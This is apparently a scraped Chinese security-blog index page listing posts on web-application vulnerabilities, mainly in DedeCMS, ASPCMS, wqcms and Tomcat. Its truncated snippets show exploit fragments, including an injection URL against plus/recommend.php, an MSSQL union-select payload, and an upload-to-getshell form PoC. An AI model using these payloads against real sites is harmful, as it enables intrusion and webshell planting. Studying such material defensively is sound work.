from:http://p2j.cn/?p=798 对比了下补丁文件只是提供exp:测试效果:
01月01日717 views评论name
php
织梦dedecms v6.7最新上传漏洞
EXp:<form action="http://www.0day5.com/plus/carbuyaction.php?dopost=memclickout&oid...
12月31日漏洞时代400 views评论name
php
逆向工程学习第一天--一个VC6编译的小程序
今天开始研究二进制了,开个文记录一下。下面是一个小程序的OD反汇编代码,自己尝试加了注释,本人逆向零基础,属于摸着石头过河的类型,有理解错误的地方,希望大牛不吝赐教。
11月21日moonsec_com1,011 views评论name
output
解决DEDECMS历史难题--找后台目录
首先看核心文件common.inc.php 大概148行左右 uploadsafe.inc.php 注意$$_key这一句,变量$key取自于$_FILE,由于$_FILE可控自然...
11月21日368 views评论name
php
学员渗透录三十_thinkphp框架一点审计
织梦注入exp 3月份
plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_F...
11月21日moonsec_com394 views评论name
type
aspcmsCSRF漏洞利用exp
wqcms6.0构造上传getshell(仅限IIS6.0)
漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点 poc: <html> <body> <form action=...
05月19日734 views评论admin
name
哈希长度扩展攻击
首先推荐一篇文章,讲的很清楚的:https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash...
05月19日颓废's Blog450 views评论name
文件
MSSQL注入技巧两则
2011年研究得出的爆表技巧 //爆破表语句 Feihacker' union select top 1 table_name from information_schema.ta...
05月19日颓废's Blog513 views评论id
name
DedeCMS最新找后台目录漏洞
看核心文件common.inc.php 大概148行左右 if($_FILES) { require_once(DEDEINC.'/uploadsafe.inc.php'); } ...
05月19日421 views评论name
php
Tomcat 源代码调试 - 看不见的 Shell 第二式之隐藏任意 Jsp 文件
作者原创,转载请注明版权。 这篇笔记我尽量少贴代码,有兴趣的可以自己去跟一下。 需要知道的背景知识: 1. 在 tomcat 的 conf/web.xml 文件中配置了一个如下的 servlet: &...
06月29日110 views评论name
servlet
45